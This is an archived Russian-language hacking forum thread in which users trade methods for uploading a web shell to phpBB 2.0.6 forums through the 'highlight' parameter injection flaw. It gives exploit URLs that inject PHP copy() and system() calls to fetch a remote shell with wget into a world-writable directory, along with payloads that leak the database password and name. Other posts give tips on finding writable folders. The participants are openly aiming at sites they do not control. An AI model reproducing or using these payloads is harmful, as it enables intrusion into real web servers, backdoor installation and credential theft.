PDA

Просмотр полной версии : Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6


vega2k
27.12.2004, 20:21
какая команда на запись в другую папку.(отличную от корневой напр. "forum)"


расcказываю как есть...
на одном форуме есть папка доступная к записыванию эта папка называется db

ВОПРОС:
как залить туда шелл, использую эту уязвимость
viewtopic.php?a=http://твой_ремотер&b=твоё_имя_файла&t=1&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527

- как я понимаю эта команда для записи в корневую папку.

форум phpBB 2.0.6

Уважаемые, только не молчите.

illusion
27.12.2004, 22:27
Для начала зделай cd <путь>, а вот потом уж заливай!
Что-то типа:
viewtopic.php?xxx=cd <путь>;wget <адрес твоего ремоута>&t=1&highlight=%2527.system($_GET[xxx]).include%2527

vega2k
27.12.2004, 23:49
нет, illusion
что-то не подходит, мне кажется ты не втом порядке записал.

vega2k
28.12.2004, 18:16
хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?

Егорыч+++
28.12.2004, 20:04
хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?

нет не так.. ищи папку в которую запись разрешена.. или хотя бы файл в который можно писать...

vega2k
28.12.2004, 21:08
admin drwxr-xr-x
cache drwxr-xr-x
db drwxrwxrwx
docs drwxr-xr-x
images drwxr-xr-x
includes drwxr-xr-x
language drwxr-xr-x
templates drwxr-xr-x
common.php -rw-r--r--
config.php -rwxrwxrwx

пишу,

viewtopic.php?a=http://www.hot.ee/vega2k/1.hp&b=&b=/db/dhelp.php&t=44&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527

и ни чего не выходит, не записывается.

а вот на другом форуме, где есть доступ на запись в саму папку форума, я могу и вдругие папки записывать, которые находяться не в папке форума а чуть выше (по дереву)

onyx3
29.12.2004, 12:30
А какой командой можно посмтатреть какие папки открыты на запись???

Егорыч+++
29.12.2004, 12:43
vega2k так может та команда что ты пишешь не работает просто на сервере?

madnet
29.12.2004, 14:44
2onyx3 Вот этой ls -l

vega2k
29.12.2004, 17:30
Егорыч+++, хех, возможно...

Shtirlic
03.06.2006, 03:19
&highlight=%2527.$poster=$dbpasswd.%2527 -пасс от базы
&highlight=%2527.$poster=$dbname.%2527-имя базы

+toxa+
03.06.2006, 13:54
29.12.2004, 16:30
Shtirlic, поднимать старые темы стало модным?

winstrool
11.01.2009, 15:57
а как залить шелл если на сервере нет wget'a?